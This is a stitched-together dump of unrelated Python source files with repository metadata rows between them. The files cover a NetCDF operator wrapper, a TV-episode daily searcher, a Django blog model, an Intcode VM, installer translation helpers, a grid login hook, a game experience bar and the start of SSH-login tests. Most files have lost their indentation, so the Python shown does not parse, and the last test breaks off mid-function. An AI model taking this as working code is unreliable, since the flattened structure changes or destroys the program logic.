# create a temporary file, use this as the output
file_name_prefix = nco_command + "_" + input.split(os.sep)[-1]
tmp_file = tempfile.NamedTemporaryFile(
mode="w+b", prefix=file_name_prefix, suffix=".tmp", delete=False
)
output = tmp_file.name
cmd.append("--output={0}".format(output))
retvals = self.call(
cmd, inputs=input, environment=environment, use_shell=use_shell
)
self.returncode = retvals["returncode"]
self.stdout = retvals["stdout"]
self.stderr = retvals["stderr"]
if self.has_error(nco_command, input, cmd, retvals):
if self.return_none_on_error:
return None
else:
print(self.stdout)
print(self.stderr)
raise NCOException(**retvals)
if return_array:
return self.read_array(output, return_array)
elif return_ma_array:
return self.read_ma_array(output, return_ma_array)
elif self.return_cdf or return_cdf:
if not self.return_cdf:
self.load_cdf_module()
return self.read_cdf(output)
else:
return output
if (nco_command in self.__dict__) or (nco_command in self.operators):
if self.debug:
print("Found method: {0}".format(nco_command))
# cache the method for later
setattr(self.__class__, nco_command, get)
return get.__get__(self)
else:
# If the method isn't in our dictionary, act normal.
print("#=====================================================")
print("Cannot find method: {0}".format(nco_command))
raise AttributeError("Unknown method {0}!".format(nco_command))
def load_cdf_module(self):
if self.cdf_module == "netcdf4":
try:
import netCDF4 as cdf
self.cdf = cdf
except Exception:
                raise ImportError(
                    "Could not load python-netcdf4 - try "
                    "setting cdf_module='scipy'"
                )
elif self.cdf_module == "scipy":
try:
import scipy.io.netcdf as cdf
self.cdf = cdf
except Exception:
                raise ImportError(
                    "Could not load scipy.io.netcdf - try "
                    "setting cdf_module='netcdf4'"
                )
else:
raise ValueError(
"Unknown value provided for cdf_module. Valid "
"values are 'scipy' and 'netcdf4'"
)
def set_return_array(self, value=True):
        self.return_cdf = value
if value:
self.load_cdf_module()
def unset_return_array(self):
self.set_return_array(False)
def has_nco(self, path=None):
if path is None:
path = self.nco_path
if os.path.isdir(path) and os.access(path, os.X_OK):
return True
else:
return False
def check_nco(self):
if self.has_nco():
call = [os.path.join(self.nco_path, "ncra"), "--version"]
proc = subprocess.Popen(
" ".join(call), stderr=subprocess.PIPE, stdout=subprocess.PIPE
)
retvals = proc.communicate()
print(retvals)
def set_nco_path(self, value):
self.nco_path = value
def get_nco_path(self):
return self.nco_path
# ==================================================================
# Additional operators:
# ------------------------------------------------------------------
@property
def module_version(self):
return "0.0.0"
def version(self):
# return NCO's version
proc = subprocess.Popen(
[os.path.join(self.nco_path, "ncra"), "--version"],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
)
ret = proc.communicate()
ncra_help = ret[1]
if isinstance(ncra_help, bytes):
ncra_help = ncra_help.decode("utf-8")
match = re.search(r"NCO netCDF Operators version (\d.*) ", ncra_help)
# some versions write version information in quotation marks
if not match:
match = re.search(r'NCO netCDF Operators version "(\d.*)" ', ncra_help)
return match.group(1).split(" ")[0]
def read_cdf(self, infile):
"""Return a cdf handle created by the available cdf library.
python-netcdf4 and scipy supported (default:scipy)"""
if not self.return_cdf:
self.load_cdf_module()
if self.cdf_module == "scipy":
# making it compatible to older scipy versions
file_obj = self.cdf.netcdf_file(infile, mode="r")
elif self.cdf_module == "netcdf4":
file_obj = self.cdf.Dataset(infile)
else:
            raise ImportError(
                "Could not import data from file {0}".format(infile)
            )
return file_obj
def open_cdf(self, infile):
"""Return a cdf handle created by the available cdf library.
        python-netcdf4 and scipy supported (default: scipy)"""
if not self.return_cdf:
self.load_cdf_module()
if self.cdf_module == "scipy":
# making it compatible to older scipy versions
print("Use scipy")
file_obj = self.cdf.netcdf_file(infile, mode="r+")
elif self.cdf_module == "netcdf4":
print("Use netcdf4")
file_obj = self.cdf.Dataset(infile, "r+")
else:
            raise ImportError(
                "Could not import data from file: {0}".format(infile)
            )
return file_obj
def read_array(self, infile, var_name):
"""Directly return a numpy array for a given variable name"""
file_handle = self.read_cdf(infile)
try:
# return the data array
return file_handle.variables[var_name][:]
except KeyError:
print("Cannot find variable: {0}".format(var_name))
raise KeyError
def read_ma_array(self, infile, var_name):
"""Create a masked array based on cdf's FillValue"""
file_obj = self.read_cdf(infile)
# .data is not backwards compatible to old scipy versions, [:] is
data = file_obj.variables[var_name][:]
# load numpy if available
try:
import numpy as np
except Exception:
raise ImportError("numpy is required to return masked arrays.")
if hasattr(file_obj.variables[var_name], "_FillValue"):
# return masked array
fill_val = file_obj.variables[var_name]._FillValue
retval = np.ma.masked_where(data == fill_val, data)
else:
# generate dummy mask which is always valid
retval = np.ma.array(data)
return retval
def auto_doc(tool, nco_self):
"""
Generate the __doc__ string of the decorated function by calling the nco help command
:param tool:
:param nco_self:
:return:
"""
def desc(func):
func.__doc__ = nco_self.call([tool, "--help"]).get("stdout")
return func
return desc
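# Example (sketch): merely accessing an operator attribute triggers
# Nco.__getattr__, which applies auto_doc, so the generated method's
# __doc__ holds the captured `ncks --help` output:
#
#   nco = Nco()
#   print(nco.ncks.__doc__)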
| mit | -416,057,038,847,101,900 | 34.429098 | 117 | 0.477025 | false |
CristianBB/SickRage | sickbeard/dailysearcher.py | 1 | 4268 | # Author: Nic Wolfe <[email protected]>
# URL: https://sickrage.github.io
# Git: https://github.com/SickRage/SickRage.git
#
# This file is part of SickRage.
#
# SickRage is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# SickRage is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SickRage. If not, see <http://www.gnu.org/licenses/>.
import datetime
import threading
import sickbeard
from sickbeard import logger
from sickbeard import db
from sickbeard import common
from sickbeard import network_timezones
from sickrage.show.Show import Show
from sickrage.helper.exceptions import MultipleShowObjectsException
class DailySearcher():
def __init__(self):
self.lock = threading.Lock()
self.amActive = False
def run(self, force=False):
"""
Runs the daily searcher, queuing selected episodes for search
:param force: Force search
"""
if self.amActive:
return
self.amActive = True
logger.log(u"Searching for new released episodes ...")
if not network_timezones.network_dict:
network_timezones.update_network_dict()
if network_timezones.network_dict:
curDate = (datetime.date.today() + datetime.timedelta(days=1)).toordinal()
else:
curDate = (datetime.date.today() + datetime.timedelta(days=2)).toordinal()
curTime = datetime.datetime.now(network_timezones.sb_timezone)
myDB = db.DBConnection()
sqlResults = myDB.select("SELECT * FROM tv_episodes WHERE status = ? AND season > 0 AND (airdate <= ? and airdate > 1)",
[common.UNAIRED, curDate])
sql_l = []
show = None
for sqlEp in sqlResults:
try:
if not show or int(sqlEp["showid"]) != show.indexerid:
show = Show.find(sickbeard.showList, int(sqlEp["showid"]))
                # handles orphaned series that are in the database but not loaded into our showlist
if not show or show.paused:
continue
except MultipleShowObjectsException:
logger.log(u"ERROR: expected to find a single show matching " + str(sqlEp['showid']))
continue
if show.airs and show.network:
# This is how you assure it is always converted to local time
air_time = network_timezones.parse_date_time(sqlEp['airdate'], show.airs, show.network).astimezone(network_timezones.sb_timezone)
# filter out any episodes that haven't started airing yet,
# but set them to the default status while they are airing
# so they are snatched faster
if air_time > curTime:
continue
ep = show.getEpisode(int(sqlEp["season"]), int(sqlEp["episode"]))
with ep.lock:
if ep.season == 0:
logger.log(u"New episode " + ep.prettyName() + " airs today, setting status to SKIPPED because is a special season")
ep.status = common.SKIPPED
else:
logger.log(u"New episode %s airs today, setting to default episode status for this show: %s" % (ep.prettyName(), common.statusStrings[ep.show.default_ep_status]))
ep.status = ep.show.default_ep_status
sql_l.append(ep.get_sql())
if len(sql_l) > 0:
myDB = db.DBConnection()
myDB.mass_action(sql_l)
else:
logger.log(u"No new released episodes found ...")
# queue episode for daily search
dailysearch_queue_item = sickbeard.search_queue.DailySearchQueueItem()
sickbeard.searchQueueScheduler.action.add_item(dailysearch_queue_item)
self.amActive = False
| gpl-3.0 | -8,188,740,517,060,104,000 | 37.45045 | 182 | 0.626992 | false |
aileron-split/aileron-web | server/blog/models.py | 1 | 1104 | from django.db import models
# Blog app models.
class Post(models.Model):
published = models.BooleanField(default=False)
published_date = models.DateTimeField(null=True, blank=True)
slug = models.SlugField(max_length=80)
title = models.CharField(max_length=80, default='Post Title')
subtitle = models.CharField(max_length=200, null=True, blank=True)
summary = models.TextField(default='Post summary.')
content = models.TextField(default='Post content.')
card_sm_image = models.ImageField(upload_to='images/cards/', null=True, blank=True)
card_mat_image = models.ImageField(upload_to='images/cards/', null=True, blank=True)
card_lg_image = models.ImageField(upload_to='images/cards/', null=True, blank=True)
video = models.URLField(null=True, blank=True)
album = models.ForeignKey('gallery.Album', blank=True, null=True)
author = models.ForeignKey('team.Member', blank=True, null=True)
created_date = models.DateTimeField(auto_now_add=True)
modified_date = models.DateTimeField(auto_now=True)
def __str__(self):
return self.title
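# Example (sketch, e.g. from a Django shell; field values are illustrative):
#
#   post = Post.objects.create(slug='hello-world', title='Hello World')
#   str(post)   # -> 'Hello World'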
| gpl-3.0 | 2,635,139,199,670,405,000 | 47 | 88 | 0.71558 | false |
BrendanLeber/adventofcode | 2019/09-sensor_boost/intcode.py | 1 | 7073 | # -*- coding: utf-8 -*-
import pdb
import sys
import traceback
from collections import deque
from enum import IntEnum
from typing import Deque, Dict, List, NamedTuple, Optional, Tuple, Union
class ParameterMode(IntEnum):
POSITIONAL = 0
IMMEDIATE = 1
RELATIVE = 2
class ParameterType(IntEnum):
READ = 0
WRITE = 1
class InstructionInfo(NamedTuple):
name: str
params: Tuple[ParameterType, ...]
INSTRUCTIONS: Dict[int, InstructionInfo] = {
1: InstructionInfo("add", (ParameterType.READ, ParameterType.READ, ParameterType.WRITE)),
2: InstructionInfo("mul", (ParameterType.READ, ParameterType.READ, ParameterType.WRITE)),
3: InstructionInfo("in", (ParameterType.WRITE,)),
4: InstructionInfo("out", (ParameterType.READ,)),
5: InstructionInfo("jnz", (ParameterType.READ, ParameterType.READ)),
6: InstructionInfo("jz", (ParameterType.READ, ParameterType.READ)),
7: InstructionInfo("lt", (ParameterType.READ, ParameterType.READ, ParameterType.WRITE)),
8: InstructionInfo("eq", (ParameterType.READ, ParameterType.READ, ParameterType.WRITE)),
9: InstructionInfo("rbo", (ParameterType.READ,)),
99: InstructionInfo("halt", tuple()),
}
class Intcode:
def __init__(self, program: List[int]) -> None:
self.ip: int = 0
self.program: List[int] = program[:]
self.tape: List[int] = program[:]
# add extra memory space for data buffer
self.tape += [0] * max(1024, len(self.program) * 3)
self.relative_base: int = 0
self.last_output: Optional[int] = None
self.last_input: Optional[int] = None
self.chained_mode: bool = False
self.inputs: Deque = deque()
# self.execution_trace: Dict[int, str] = {}
def _disasm(self) -> str:
addr = f"{self.ip:5}"
opcode = self.tape[self.ip] % 100
opname = INSTRUCTIONS[opcode].name
params = []
mask = 10
for pnum, ptype in enumerate(INSTRUCTIONS[opcode].params, 1):
mask *= 10
pmode = ParameterMode((self.tape[self.ip] // mask) % 10)
if ptype == ParameterType.WRITE:
leader = "$"
elif pmode == ParameterMode.POSITIONAL:
leader = "$"
elif pmode == ParameterMode.RELATIVE:
leader = "@"
else:
leader = ""
params.append(f"{leader}{self.tape[self.ip + pnum]}")
return addr + ": " + f"{opname} " + ", ".join(params)
def decode_instruction(self) -> Tuple[int, List[int]]:
"""Decode the opcode and the arguments for this instruction."""
opcode: int = self.tape[self.ip] % 100
arguments: List[int] = []
mask: int = 10
# start at 1 to skip the opcode in the instruction
for param_num, param_type in enumerate(INSTRUCTIONS[opcode].params, 1):
mask *= 10
param_mode: ParameterMode = ParameterMode((self.tape[self.ip] // mask) % 10)
if param_type == ParameterType.WRITE:
position = self.tape[self.ip + param_num]
if param_mode == ParameterMode.RELATIVE:
position += self.relative_base
arguments.append(position)
elif param_mode == ParameterMode.POSITIONAL:
position = self.tape[self.ip + param_num]
arguments.append(self.tape[position])
elif param_mode == ParameterMode.IMMEDIATE:
arguments.append(self.tape[self.ip + param_num])
elif param_mode == ParameterMode.RELATIVE:
position = self.tape[self.ip + param_num] + self.relative_base
arguments.append(self.tape[position])
else:
raise TypeError(f"unknown parameter mode {param_mode}")
return (opcode, arguments)
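    # Worked example for decode_instruction (sketch): with tape
    # [1002, 4, 3, 4, 33] and ip=0, instruction 1002 is opcode 2 (mul) with
    # parameter modes 0,1,0, so params become [tape[4], 3, 4] = [33, 3, 4]
    # and execute() writes 33 * 3 = 99 into position 4.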
def execute(self) -> Union[Optional[int], bool]:
"""Execute the instructions contained in the VM memory."""
while self.ip < len(self.program):
# self.execution_trace[self.ip] = self._disasm()
opcode, params = self.decode_instruction()
if opcode == 1:
self.tape[params[2]] = params[0] + params[1]
self.ip += 1 + len(params)
elif opcode == 2:
self.tape[params[2]] = params[0] * params[1]
self.ip += 1 + len(params)
elif opcode == 3:
if self.chained_mode and self.inputs:
value = self.inputs.popleft()
else:
value = int(input("$ "))
self.last_input = self.tape[params[0]] = value
self.ip += 1 + len(params)
elif opcode == 4:
self.last_output = params[0]
self.ip += 1 + len(params)
if self.chained_mode:
return True
else:
print(self.last_output)
elif opcode == 5:
self.ip = params[1] if params[0] else self.ip + 1 + len(params)
elif opcode == 6:
self.ip = params[1] if not params[0] else self.ip + 1 + len(params)
elif opcode == 7:
self.tape[params[2]] = 1 if params[0] < params[1] else 0
self.ip += 1 + len(params)
elif opcode == 8:
self.tape[params[2]] = 1 if params[0] == params[1] else 0
self.ip += 1 + len(params)
elif opcode == 9:
self.relative_base += params[0]
self.ip += 1 + len(params)
elif opcode == 99:
if self.chained_mode:
return False
else:
return self.last_output
raise EOFError("reached end of tape without finding halt instruction.")
def reset(self) -> None:
"""Reset the VM state before starting a new execution."""
self.tape = self.program[:]
# add extra memory space for data buffer
self.tape += [0] * max(1024, len(self.program) * 3)
self.ip = 0
self.relative_base = 0
# self.execution_trace = {}
def set_inputs(self, inputs: List[int]) -> None:
"""Set the inputs for the VM to read."""
self.inputs = deque(inputs)
def set_noun_and_verb(self, noun: int, verb: int) -> None:
"""Set the noun and verb to initialize the program."""
self.tape[1] = noun
self.tape[2] = verb
if __name__ == "__main__":
program: List[int] = []
with open(sys.argv[1]) as inf:
for line in inf:
program += list(map(int, line.strip().split(",")))
try:
vm = Intcode(program)
vm.execute()
# addrs = list(vm.execution_trace.keys())
# addrs.sort()
# for addr in addrs:
# print(f"{vm.execution_trace[addr]}")
# for ip in range(addrs[-1] + 1, len(vm.program)):
# print(f"{ip:5d}: {vm.program[ip]}")
except Exception:
traceback.print_exc()
pdb.post_mortem()
| mit | -8,612,136,722,465,389,000 | 37.862637 | 93 | 0.548565 | false |
Alberto-Beralix/Beralix | i386-squashfs-root/usr/lib/ubiquity/ubiquity/i18n.py | 1 | 12630 | # -*- coding: utf-8; Mode: Python; indent-tabs-mode: nil; tab-width: 4 -*-
# Copyright (C) 2006, 2007, 2008 Canonical Ltd.
# Written by Colin Watson <[email protected]>.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import re
import subprocess
import codecs
import os
import locale
import sys
from ubiquity import misc, im_switch
# if 'just_country' is True, only the country is changing
def reset_locale(frontend, just_country=False):
frontend.start_debconf()
di_locale = frontend.db.get('debian-installer/locale')
if not di_locale:
# TODO cjwatson 2006-07-17: maybe fetch
# languagechooser/language-name and set a language based on
# that?
di_locale = 'en_US.UTF-8'
if 'LANG' not in os.environ or di_locale != os.environ['LANG']:
os.environ['LANG'] = di_locale
os.environ['LANGUAGE'] = di_locale
try:
locale.setlocale(locale.LC_ALL, '')
except locale.Error, e:
print >>sys.stderr, 'locale.setlocale failed: %s (LANG=%s)' % \
(e, di_locale)
if not just_country:
misc.execute_root('fontconfig-voodoo',
'--auto', '--force', '--quiet')
im_switch.start_im()
return di_locale
_strip_context_re = None
def strip_context(unused_question, string):
# po-debconf context
global _strip_context_re
if _strip_context_re is None:
_strip_context_re = re.compile(r'\[\s[^\[\]]*\]$')
string = _strip_context_re.sub('', string)
return string
_translations = None
def get_translations(languages=None, core_names=[], extra_prefixes=[]):
"""Returns a dictionary {name: {language: description}} of translatable
strings.
If languages is set to a list, then only languages in that list will be
translated. If core_names is also set to a list, then any names in that
list will still be translated into all languages. If either is set, then
the dictionary returned will be built from scratch; otherwise, the last
cached version will be returned."""
global _translations
if _translations is None or languages is not None or core_names or extra_prefixes:
if languages is None:
use_langs = None
else:
use_langs = set('c')
for lang in languages:
ll_cc = lang.lower().split('.')[0]
ll = ll_cc.split('_')[0]
use_langs.add(ll_cc)
use_langs.add(ll)
prefixes = 'ubiquity|partman/text/undo_everything|partman/text/unusable|partman-basicfilesystems/bad_mountpoint|partman-basicfilesystems/text/specify_mountpoint|partman-basicmethods/text/format|partman-newworld/no_newworld|partman-partitioning|partman-target/no_root|partman-target/text/method|grub-installer/bootdev|popularity-contest/participate'
prefixes = reduce(lambda x, y: x+'|'+y, extra_prefixes, prefixes)
_translations = {}
devnull = open('/dev/null', 'w')
db = subprocess.Popen(
['debconf-copydb', 'templatedb', 'pipe',
'--config=Name:pipe', '--config=Driver:Pipe',
'--config=InFd:none',
'--pattern=^(%s)' % prefixes],
stdout=subprocess.PIPE, stderr=devnull,
# necessary?
preexec_fn=misc.regain_privileges)
question = None
descriptions = {}
fieldsplitter = re.compile(r':\s*')
for line in db.stdout:
line = line.rstrip('\n')
if ':' not in line:
if question is not None:
_translations[question] = descriptions
descriptions = {}
question = None
continue
(name, value) = fieldsplitter.split(line, 1)
if value == '':
continue
name = name.lower()
if name == 'name':
question = value
elif name.startswith('description'):
namebits = name.split('-', 1)
if len(namebits) == 1:
lang = 'c'
else:
lang = namebits[1].lower()
# TODO: recode from specified encoding
lang = lang.split('.')[0]
if (use_langs is None or lang in use_langs or
question in core_names):
value = strip_context(question, value)
descriptions[lang] = value.replace('\\n', '\n')
elif name.startswith('extended_description'):
namebits = name.split('-', 1)
if len(namebits) == 1:
lang = 'c'
else:
lang = namebits[1].lower()
# TODO: recode from specified encoding
lang = lang.split('.')[0]
if (use_langs is None or lang in use_langs or
question in core_names):
value = strip_context(question, value)
if lang not in descriptions:
descriptions[lang] = value.replace('\\n', '\n')
# TODO cjwatson 2006-09-04: a bit of a hack to get the
# description and extended description separately ...
if question in ('grub-installer/bootdev',
'partman-newworld/no_newworld',
'ubiquity/text/error_updating_installer'):
descriptions["extended:%s" % lang] = \
value.replace('\\n', '\n')
db.wait()
devnull.close()
return _translations
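# Example (sketch; the template name below is illustrative):
#
#   translations = get_translations(languages=['de_DE.UTF-8'],
#                                   core_names=['ubiquity/text/continue'])
#   translations['ubiquity/text/continue'].get('de')  # German text, if any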
string_questions = {
'new_size_label': 'partman-partitioning/new_size',
'partition_create_heading_label': 'partman-partitioning/text/new',
'partition_create_type_label': 'partman-partitioning/new_partition_type',
'partition_create_mount_label': 'partman-basicfilesystems/text/specify_mountpoint',
'partition_create_use_label': 'partman-target/text/method',
'partition_create_place_label': 'partman-partitioning/new_partition_place',
'partition_edit_use_label': 'partman-target/text/method',
'partition_edit_format_label': 'partman-basicmethods/text/format',
'partition_edit_mount_label': 'partman-basicfilesystems/text/specify_mountpoint',
'grub_device_dialog': 'grub-installer/bootdev',
'grub_device_label': 'grub-installer/bootdev',
# TODO: it would be nice to have a neater way to handle stock buttons
'quit': 'ubiquity/imported/quit',
'back': 'ubiquity/imported/go-back',
'cancelbutton': 'ubiquity/imported/cancel',
'exitbutton': 'ubiquity/imported/quit',
'closebutton1': 'ubiquity/imported/close',
'cancelbutton1': 'ubiquity/imported/cancel',
'okbutton1': 'ubiquity/imported/ok',
}
string_extended = set()
def map_widget_name(prefix, name):
"""Map a widget name to its translatable template."""
if prefix is None:
prefix = 'ubiquity/text'
if '/' in name:
question = name
elif name in string_questions:
question = string_questions[name]
else:
question = '%s/%s' % (prefix, name)
return question
def get_string(name, lang, prefix=None):
"""Get the translation of a single string."""
question = map_widget_name(prefix, name)
translations = get_translations()
if question not in translations:
return None
if lang is None:
lang = 'c'
else:
lang = lang.lower()
if name in string_extended:
lang = 'extended:%s' % lang
if lang in translations[question]:
text = translations[question][lang]
else:
ll_cc = lang.split('.')[0]
ll = ll_cc.split('_')[0]
if ll_cc in translations[question]:
text = translations[question][ll_cc]
elif ll in translations[question]:
text = translations[question][ll]
elif lang.startswith('extended:'):
text = translations[question]['extended:c']
else:
text = translations[question]['c']
return unicode(text, 'utf-8', 'replace')
# Based on code by Walter Dörwald:
# http://mail.python.org/pipermail/python-list/2007-January/424460.html
def ascii_transliterate(exc):
if not isinstance(exc, UnicodeEncodeError):
raise TypeError("don't know how to handle %r" % exc)
import unicodedata
s = unicodedata.normalize('NFD', exc.object[exc.start])[:1]
    if ord(s) < 128:
return s, exc.start + 1
else:
return u'', exc.start + 1
codecs.register_error('ascii_transliterate', ascii_transliterate)
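# Example: u'Dörwald'.encode('ascii', 'ascii_transliterate') yields
# 'Dorwald' - the NFD base letter is kept, and characters with no ASCII
# base letter are dropped entirely.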
# Returns a tuple of (current language, sorted choices, display map).
def get_languages(current_language_index=-1, only_installable=False):
import gzip
import PyICU
current_language = "English"
if only_installable:
from apt.cache import Cache
        # Workaround for an issue where euid != uid and the apt cache has
        # not yet been loaded, causing a SystemError when libapt-pkg tries
        # to load the Cache for the first time.
with misc.raised_privileges():
cache = Cache()
languagelist = gzip.open('/usr/lib/ubiquity/localechooser/languagelist.data.gz')
language_display_map = {}
i = 0
for line in languagelist:
line = unicode(line, 'utf-8')
if line == '' or line == '\n':
continue
code, name, trans = line.strip(u'\n').split(u':')[1:]
if code in ('C', 'dz', 'km'):
i += 1
continue
if only_installable:
pkg_name = 'language-pack-%s' % code
#special case these
if pkg_name.endswith('_CN'):
pkg_name = 'language-pack-zh-hans'
elif pkg_name.endswith('_TW'):
pkg_name = 'language-pack-zh-hant'
elif pkg_name.endswith('_NO'):
pkg_name = pkg_name.split('_NO')[0]
elif pkg_name.endswith('_BR'):
pkg_name = pkg_name.split('_BR')[0]
try:
pkg = cache[pkg_name]
if not (pkg.installed or pkg.candidate):
i += 1
continue
except KeyError:
i += 1
continue
language_display_map[trans] = (name, code)
if i == current_language_index:
current_language = trans
i += 1
languagelist.close()
if only_installable:
del cache
try:
# Note that we always collate with the 'C' locale. This is far
# from ideal. But proper collation always requires a specific
# language for its collation rules (languages frequently have
# custom sorting). This at least gives us common sorting rules,
# like stripping accents.
collator = PyICU.Collator.createInstance(PyICU.Locale('C'))
except:
collator = None
def compare_choice(x):
if language_display_map[x][1] == 'C':
return None # place C first
if collator:
try:
return collator.getCollationKey(x).getByteArray()
except:
pass
# Else sort by unicode code point, which isn't ideal either,
# but also has the virtue of sorting like-glyphs together
return x
sorted_choices = sorted(language_display_map, key=compare_choice)
return current_language, sorted_choices, language_display_map
def default_locales():
languagelist = open('/usr/lib/ubiquity/localechooser/languagelist')
defaults = {}
for line in languagelist:
line = unicode(line, 'utf-8')
if line == '' or line == '\n':
continue
bits = line.strip(u'\n').split(u';')
code = bits[0]
locale = bits[4]
defaults[code] = locale
languagelist.close()
return defaults
# vim:ai:et:sts=4:tw=80:sw=4:
| gpl-3.0 | -2,029,924,248,393,744,000 | 36.698507 | 356 | 0.588645 | false |
antont/tundra | src/Application/PythonScriptModule/pymodules_old/simiangrid/auth.py | 1 | 2238 | #httplib was ok and httplib2 especially had nice api, but they don't work thru proxies and stuff
#-- curl is the most robust thing
#import httplib
import curl #a high level wrapper over pycurl bindings
import json
import hashlib  # only because a password is hardcoded here for now - in real use it comes from the connection or launcher
try:
import naali
except ImportError:
naali = None #so that can test standalone too, without Naali
else:
import circuits
class SimiangridAuthentication(circuits.BaseComponent):
pass #put disconnecting to on_exit here to not leave old versions while reloading
url = "http://localhost/Grid/"
c = curl.Curl()
def simiangrid_auth(url, username, md5hex):
params = {'RequestMethod': 'AuthorizeIdentity',
'Identifier': username,
'Type': 'md5hash',
'Credential': md5hex}
rdata = c.post(url, params)
print rdata
r = json.loads(rdata)
#http://code.google.com/p/openmetaverse/wiki/AuthorizeIdentity
success = r.get('Success', False)
#NOTE: docs say reply should have Success:false upon failure.
#however in my test run it doesn't just the Message of missing/invalid creds
#this code works for that too.
return success
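# Example round trip (sketch; mirrors the standalone test at the bottom of
# this file - assumes a local SimianGrid at `url`):
#
#   ok = simiangrid_auth(url, "Lady Tron",
#                        hashlib.md5("some password").hexdigest())
#   # -> True when the grid replies { "Success": true, ... }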
def on_connect(conn_id, userconn):
print userconn.GetLoginData()
username = userconn.GetProperty("username")
username = username.replace('_', ' ') #XXX HACK: tundra login doesn't allow spaces, whereas simiangrid frontend demands them
pwd = userconn.GetProperty("password")
md5hex = hashlib.md5(pwd).hexdigest()
success = simiangrid_auth(url, username, md5hex)
print "Authentication success:", success, "for", conn_id, userconn
if not success:
userconn.DenyConnection()
if naali is not None:
s = naali.server
if s.IsAboutToStart():
s.connect("UserAboutToConnect(int, UserConnection*)", on_connect)
print "simiangrid/auth.py running on server - hooked to authorize connections"
else:
on_connect(17, {'username': "Lady Tron",
'password': "They only want you when you're seventeen"})
"""
{ "Success":true, "UserID":"fe5f5ac3-7b28-4276-ae50-133db72040f0" }
Authentication success: True
"""
| apache-2.0 | -1,794,691,461,481,782,000 | 33.430769 | 128 | 0.689455 | false |
MarkusHackspacher/PythonFarmGame | farmlib/expbar.py | 1 | 2110 | '''
Created on 31-05-2012
@author: orneo1212
'''
import pygame
from pygameui import Label
class ExpBar(Label):
"""ExpBar class
"""
def __init__(self, player):
self.player = player
self.oldexp = -1.0
Label.__init__(self, "", (9, 58))
def update_text(self):
"""update text
:return:
"""
# get data
exp = self.player.exp
nextlvlexp = self.player.nextlvlexp
level = self.player.level
self.oldexp = self.player.exp
# calculate progress and set text
progress = int(exp / nextlvlexp * 100)
self.settext("Level: " + str(level) + " Exp: {0!s}/{1!s} ({2!s} %)".
format(int(exp), int(nextlvlexp), progress))
def update(self):
"""update
:return:
"""
if self.oldexp != self.player.exp:
self.repaint()
def repaint(self):
"""repaint
:return:
"""
self.update_text()
self.size = self.width, self.height = ((48 + 2) * 6 - 1, 16)
self.create_widget_image()
# draw background
pygame.draw.rect(self.img, (0, 32, 0),
(1, 1, self.width - 1, self.height - 1))
# draw background (progress)
progresswidth = self.width / self.player.nextlvlexp * self.player.exp
pygame.draw.rect(self.img, (0, 100, 0),
(1, 1, int(progresswidth) - 1, self.height - 1))
# draw border
pygame.draw.rect(self.img, (0, 255, 0),
(1, 1, self.width - 1, self.height - 1), 1)
# draw text
text = self.gettext()
txtimg = self.labelfont.render(text, 0, (64, 255, 100), (255, 0, 255))
txtimg.set_colorkey((255, 0, 255))
# Draw centered
px = self.width / 2 - txtimg.get_size()[0] / 2
py = self.height / 2 - txtimg.get_size()[1] / 2
self.img.blit(txtimg, (px, py))
def redraw(self, surface):
"""redraw
:param surface:
:return:
"""
surface.blit(self.img, self.position)
| gpl-3.0 | 8,185,247,811,750,345,000 | 26.402597 | 78 | 0.507109 | false |
openzim/zimfarm | dispatcher/backend/src/tests/integration/routes/users/test_auth.py | 1 | 4647 | import os
import base64
import pathlib
import datetime
import tempfile
import subprocess
import pytest
OPENSSL_BIN = os.getenv("OPENSSL_BIN", "openssl")
class TestAuthentication:
def do_test_token(self, client, token):
headers = {"Authorization": token, "Content-Type": "application/json"}
response = client.get("/auth/test", headers=headers)
assert response.status_code == 204
def do_get_token_with(self, client, username, password):
headers = {"Content-Type": "application/x-www-form-urlencoded"}
response = client.post(
"/auth/authorize",
headers=headers,
data=f"username={username}&password={password}",
)
return response
@pytest.mark.parametrize(
"username, password, assert_code",
[
("some-user", "hop", 401),
("some-user2", "some-password", 401),
("some-user", "some-password", 200),
],
)
def test_credentials(self, client, user, username, password, assert_code):
response = self.do_get_token_with(client, username, password)
assert response.status_code == assert_code
if assert_code == 200:
response_json = response.get_json()
assert "access_token" in response_json
self.do_test_token(client, response_json["access_token"])
def test_refresh_token(self, client, user):
response = self.do_get_token_with(client, "some-user", "some-password")
assert response.status_code == 200
response_json = response.get_json()
access_token = response_json["access_token"]
refresh_token = response_json["refresh_token"]
headers = {
"Authorization": access_token,
"Content-Type": "application/json",
"refresh-token": refresh_token,
}
assert client.post("/auth/token", headers=headers).status_code == 200
headers["refresh-token"] = "".join(headers["refresh-token"][:-1])
assert client.post("/auth/token", headers=headers).status_code == 401
@pytest.mark.parametrize(
"username, key_to_use, assert_code",
[
("some-user", "good", 200),
("some-user2", "good", 401),
("some-user", "bad", 401),
("some-user", "none", 401),
],
)
def test_ssh(
self,
client,
user,
working_private_key,
not_working_private_key,
username,
key_to_use,
assert_code,
):
key = {"good": working_private_key, "bad": not_working_private_key}.get(
key_to_use,
"-----BEGIN RSA PRIVATE KEY-----\nnope\n-----END RSA PRIVATE KEY-----\n",
)
if key_to_use == "none":
with pytest.raises(IOError):
self.do_test_ssh(client, key, username)
else:
response = self.do_test_ssh(client, key, username)
if response.status_code != assert_code:
print(response.get_json())
assert response.status_code == assert_code
if assert_code == 200:
self.do_test_token(client, response.get_json()["access_token"])
def do_test_ssh(self, client, private_key, username):
# build the SSH payload
now = datetime.datetime.utcnow()
message = f"{username}:{now.isoformat()}"
tmp_dir = pathlib.Path(tempfile.mkdtemp())
# write private key to a temp file
private_key_path = tmp_dir.joinpath("key")
with open(private_key_path, "wb") as fp:
fp.write(private_key.encode("ASCII"))
message_path = tmp_dir.joinpath("message")
signatured_path = tmp_dir.joinpath(f"{message_path.name}.sig")
